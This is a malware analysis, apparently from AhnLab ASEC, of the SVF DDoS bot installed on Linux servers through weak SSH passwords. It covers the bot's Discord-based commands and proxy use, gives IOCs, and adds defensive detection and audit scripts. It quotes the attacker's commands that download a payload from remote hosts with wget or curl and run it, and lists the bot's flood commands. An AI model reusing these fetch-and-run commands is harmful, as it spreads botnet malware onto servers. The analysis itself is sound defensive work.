Attacks Targeting Linux SSH Servers to Install SVF DDoS Bot

AhnLab Security intelligence Center (ASEC) is monitoring attacks targeting poorly managed Linux servers by operating multiple honeypots. One of the most commonly attacked honeypot services is SSH with weak credentials, and a large number of DDoS and CoinMiner threat actors target this service.

ASEC has recently identified a case of an attack that installs DDoS Bot malware called SVF Botnet from an external source. SVF Bot is developed in Python and uses Discord as its C&C server. It also utilizes multiple proxy servers during DDoS attacks.

1. SVF Botnet Attack

The threat actor logged in to the honeypot Linux server and successfully installed SVF Bot with the following command. As SVF Bot is developed in Python, the command first installs the Python libraries the bot depends on.

> # python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
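A command line like the one above leaves a recognisable shape in whatever records shell activity (an SSH honeypot's command log, auditd execve events, or shell history). The following detector is an added example, not code from the ASEC article: it scores each command line against the four stages of the install chain (venv creation, pip install of the Discord library, download of main.py with wget/curl, execution of main.py with a `-s` group id) and flags lines that hit at least three, which also catches the update variant that skips the venv. The sample command lines and the host names in them are constructed placeholders.

```python
"""Flag command lines that match the SVF Bot installation chain.

Added example, not code from the ASEC article. Each stage is one regex that
must match inside a single shell command line; a line reaching MIN_STAGES
stages is reported. Host names in SAMPLE_COMMANDS are constructed placeholders.
"""
import re

STAGES = {
    # python -m venv <dir>
    "venv_created":    re.compile(r"\bpython3?\s+-m\s+venv\b"),
    # pip install ... discord / discord.py (within the same command segment)
    "discord_library": re.compile(r"\bpip3?\s+install\b[^;&|]*\bdiscord(?:\.py)?\b"),
    # wget/curl writing the payload to main.py via -O or shell redirection
    "main_py_fetched": re.compile(r"\b(?:wget|curl)\b[^;&|]*(?:-O\s+|>\s*)\S*main\.py\b"),
    # python main.py -s <server/group id>
    "main_py_run":     re.compile(r"\bpython3?\s+\S*main\.py\s+-s\s+\S+"),
}
MIN_STAGES = 3  # the update command has no venv step but still hits three stages


def match_stages(cmdline: str) -> list[str]:
    """Names of the install stages present in one command line, in STAGES order."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]


def is_svf_install(cmdline: str) -> bool:
    return len(match_stages(cmdline)) >= MIN_STAGES


def scan(lines):
    """Yield (line number, matched stages) for each line reaching the threshold."""
    for no, line in enumerate(lines, 1):
        stages = match_stages(line)
        if len(stages) >= MIN_STAGES:
            yield no, stages


# Constructed sample input: one install chain, two benign lines, one update-style chain.
SAMPLE_COMMANDS = [
    "python -m venv venv; source ./venv/bin/activate; pip install discord discord.py "
    "requests aiohttp lxml; wget http://paste.example/abcd -O main.py; python main.py -s 5",
    "python3 -m venv .venv && . .venv/bin/activate && pip install requests flask",
    "curl -sL https://pkg.example.org/setup.sh | bash",
    "pip install discord && pip install requests && pip install lxml && "
    "curl -sL http://203.0.113.10:55/ > main.py && python main.py -s 7",
]

if __name__ == "__main__":
    for no, stages in scan(SAMPLE_COMMANDS):
        print(f"line {no}: {', '.join(stages)}")
```

The stage regexes deliberately stop at `;`, `&` and `|` so that, for example, a `curl ... | bash` in one segment is not credited to a `main.py` in another. The thresholds are behavioural rather than tied to the paste-site or IP addresses in the article, so a re-hosted copy of the bot is still caught.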

2. Analysis of SVF Bot

The source code contains a description stating that the malware was created by “SVF Team” and that it was developed for fun because the Botnet using PuTTY was not working.

Figure 1. SVF Bot

When SVF Bot is executed, it authenticates with the Discord server using a bot token embedded in the source code and then operates according to the threat actor's commands. On startup it also uses a webhook to send its server name. The server name was set to 5 through the -s argument in the installation command; it acts as a group identifier, allowing the threat actor to send DDoS commands to each group separately.

Most of the supported commands are for DDoS attacks, with L7 HTTP Flood and L4 UDP Flood being the main types supported. The following is a list of supported commands.

Command | Argument | Description
$help | N/A | Introduces the botnet (only the first server responds)
$methods | N/A | Lists DDoS attack methods (only the first server responds)
$load | <http> <maxtime> | Scrapes public proxy addresses, validates them, and saves them into a list (used in L7 HTTP flood attacks)
$unload | <http> | Resets the proxy list
$customhttp | <threads> <times> <semaphore> <bypasscheck> <servers/concurrents> <website> | L7 HTTP flood (custom)
$http | <servers/concurrents> <website> | L7 HTTP flood
$customudp | <ip:port> <Packet Strength> <threads> <Packets Per Thread> <servers/concurrents> | L4 UDP flood (custom)
$udp | <servers/concurrents> <ip:port> | L4 UDP flood
$restart | N/A | Update
$crash | N/A | Force shutdown
$stop | N/A | Stops the HTTP flood attack

Table 1. List of commands

Figure 2. Part of the HTTP flood attack routine

This DDoS bot has a simple structure, but it is unusual in that it supports proxies for HTTP flood attacks. The malware first obtains proxy addresses from the following 10 sources, then validates each one by attempting to reach Google through it before adding it to the list. When launching an HTTP flood attack, the malware randomly selects a proxy address from the list to use when attempting to connect.

Public Proxy Address
hxxps://sslproxies[.]org/
hxxps://free-proxy-list[.]net/
hxxps://www.us-proxy[.]org/
hxxps://raw.githubusercontent[.]com/ShiftyTR/Proxy-List/master/http.txt
hxxps://raw.githubusercontent[.]com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt
hxxps://raw.githubusercontent[.]com/officialputuid/KangProxy/KangProxy/http/http.txt
hxxps://raw.githubusercontent[.]com/mmpx12/proxy-list/master/http.txt
hxxps://raw.githubusercontent[.]com/mmpx12/proxy-list/master/https.txt
hxxps://raw.githubusercontent[.]com/roosterkid/openproxylist/main/HTTPS_RAW.txt
hxxps://raw.githubusercontent[.]com/proxy4parsing/proxy-list/main/http.txt

Table 2. Websites with public proxy addresses saved

Figure 3. Obtaining public proxy addresses and validation routine
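The traits described in this section (Discord as the control channel, a startup webhook, the `$`-prefixed command set of Table 1 and the proxy sources of Table 2) are specific enough to triage a suspicious Python file found on a host, for example a main.py inside an unexpected venv. The script below is an added example, not code from the article, from ASEC or from the malware: it parses the file with `ast` (never executing it), reports which of those traits are present, and gives a heuristic verdict. The two sample scripts it is run against are constructed marker-only stubs, not the bot's code.

```python
"""Triage a Python file for the SVF Bot traits described in the ASEC write-up.

Added example; not code from the article, from ASEC, or from the malware.
The file under review is parsed with `ast` and never executed; if it does not
parse (truncated or deliberately malformed), crude regexes are used instead.
"""
import ast
import re

# Command names from Table 1, without the '$' prefix the bot uses.
SVF_COMMANDS = {"help", "methods", "load", "unload", "customhttp", "http",
                "customudp", "udp", "restart", "crash", "stop"}
# Distinctive substrings of the Table 2 proxy-list sources.
SVF_PROXY_SOURCES = ("sslproxies.org", "free-proxy-list.net", "us-proxy.org",
                     "ShiftyTR/Proxy-List", "jetkai/proxy-list",
                     "officialputuid/KangProxy", "mmpx12/proxy-list",
                     "roosterkid/openproxylist", "proxy4parsing/proxy-list")
WEBHOOK_RE = re.compile(r"discord(?:app)?\.com/api/webhooks/")


def _extract(src: str):
    """Return (imported top-level modules, defined function names, string literals)."""
    try:
        tree = ast.parse(src)
    except SyntaxError:
        imports = set(re.findall(r"^\s*(?:from|import)\s+([A-Za-z_]\w*)", src, re.M))
        funcs = set(re.findall(r"^\s*(?:async\s+)?def\s+([A-Za-z_]\w*)", src, re.M))
        pairs = re.findall(r"""(?:"([^"\n]*)"|'([^'\n]*)')""", src)
        return imports, funcs, [a or b for a, b in pairs]
    imports, funcs, strings = set(), set(), []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            funcs.add(node.name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value)
    return imports, funcs, strings


def triage(src: str) -> dict:
    imports, funcs, strings = _extract(src)
    # discord.py handlers are usually named after the command; a hand-rolled
    # dispatcher would instead compare against '$name' literals.
    names = funcs | {s.lstrip("$") for s in strings}
    commands = sorted(SVF_COMMANDS & names)
    proxy_hits = [p for p in SVF_PROXY_SOURCES if p in src]
    result = {
        "discord_import": "discord" in imports,
        "webhook": any(WEBHOOK_RE.search(s) for s in strings),
        "commands": commands,
        "proxy_sources": proxy_hits,
    }
    # Heuristic verdict (my threshold, not the article's): Discord as C&C plus
    # most of the command set plus at least one of the proxy scrapers.
    result["likely_svf"] = (result["discord_import"] and len(commands) >= 4
                            and len(proxy_hits) >= 1)
    return result


# Constructed stubs carrying only the markers; neither contains attack logic.
SAMPLE_SUSPECT = '''
import discord
from discord.ext import commands
import requests
WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/placeholder"
PROXY_SOURCES = ["https://sslproxies.org/", "https://free-proxy-list.net/",
    "https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt"]
bot = commands.Bot(command_prefix="$", intents=discord.Intents.all())
@bot.command()
async def methods(ctx): ...
@bot.command()
async def load(ctx, *args): ...
@bot.command()
async def http(ctx, *args): ...
@bot.command()
async def udp(ctx, *args): ...
@bot.command()
async def stop(ctx): ...
'''
SAMPLE_BENIGN = '''
import discord
from discord.ext import commands
bot = commands.Bot(command_prefix="!", intents=discord.Intents.default())
@bot.command()
async def ping(ctx): ...
@bot.command()
async def help(ctx): ...
'''

if __name__ == "__main__":
    for label, src in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, triage(src))
```

Any single trait (a Discord import, a `$help` command) is common in legitimate bots, which is why the verdict requires the combination; the individual fields are still returned so an analyst can weigh a partial match, and a file that fails to parse is handled by the regex fallback rather than being skipped.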

Note that when the bot updates itself via the $restart command, it re-downloads and reinstalls SVF Bot with the following command. As of now, the download is no longer available, but an improved version of SVF Bot may be distributed in the future.

> pip install discord && pip install requests && pip install lxml && curl -sL hxxp://146.59.239[.]144:55/ > main.py && python main.py -s {server}

3. Conclusion

There have been cases of SVF DDoS Bot being installed on poorly managed Linux servers. Once installed, the Linux server receives commands from the threat actor and can be abused as a DDoS bot.

Administrators should use passwords that are difficult to guess and change them regularly to protect the Linux server from brute force and dictionary attacks, and patch their systems to the latest version to prevent vulnerability exploitation. For servers that are publicly accessible from outside, security solutions such as a firewall must be used to restrict access by threat actors. Lastly, AhnLab V3 should be updated to the latest version to prevent malware infection in advance.
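The entry point in this case was SSH password guessing, so the service's own configuration is the first thing to verify. The following audit is an added example, not code from the ASEC article: it reads an sshd_config, applies sshd's rule that the first value set for a keyword wins (a later duplicate does not override it), stops at the first `Match` block because directives there apply only conditionally, and reports the settings that keep password guessing viable. The defaults assumed for absent keywords are those of OpenSSH 7.x and later, and the `MaxAuthTries` ceiling of 4 is my chosen threshold; both sample configurations are constructed.

```python
"""Audit an sshd_config for settings that leave SSH password guessing open.

Added example, not from the ASEC article. Parsing follows sshd's own rules:
keywords are case-insensitive, '=' may separate keyword and value, the first
value seen for a keyword wins, and directives after a 'Match' line are
conditional, so the audit stops there.
"""

# keyword -> (acceptable values or None for a numeric check, reason)
CHECKS = {
    "permitrootlogin":        ({"no", "prohibit-password", "without-password"},
                               "root must not be reachable by password guessing"),
    "passwordauthentication": ({"no"},
                               "password logins are the brute-force surface; key-based auth removes it"),
    "permitemptypasswords":   ({"no"}, "empty passwords are the first dictionary entry"),
    "maxauthtries":           (None, "too many attempts per connection (my threshold: <= 4)"),
}
# Assumed OpenSSH 7.x+ defaults, used when a keyword is absent from the file.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}
MAX_AUTH_TRIES_CEILING = 4


def effective_settings(config_text: str) -> dict:
    """Keyword -> value as sshd would resolve them for the global section."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break  # everything after this applies only to matching connections
        if len(parts) == 2 and key not in seen:
            seen[key] = parts[1].strip().lower()
    return seen


def audit(config_text: str) -> list[str]:
    """Return one finding string per weak setting; an empty list means clean."""
    settings = effective_settings(config_text)
    findings = []
    for key, (ok_values, reason) in CHECKS.items():
        value = settings.get(key, DEFAULTS[key])
        if ok_values is None:
            weak = not value.isdigit() or int(value) > MAX_AUTH_TRIES_CEILING
        else:
            weak = value not in ok_values
        if weak:
            findings.append(f"{key}={value}: {reason}")
    return findings


# Constructed samples: a weak configuration and a hardened one.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
# this later duplicate does not override the first value sshd read
PermitRootLogin no
"""
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
Match User deploy
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg) or ["no findings"])
```

The first-value-wins rule is the part administrators most often get wrong: appending `PermitRootLogin no` to the end of a file that already sets it to `yes` changes nothing, and an audit that takes the last value would wrongly report the host as fixed.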

MD5
cffe3fb6cb3e4b9b453c4147bdcd8c12

URL
http[:]//146[.]59[.]239[.]144[:]55/
https[:]//termbin[.]com/4ccx

IP
185[.]254[.]75[.]44
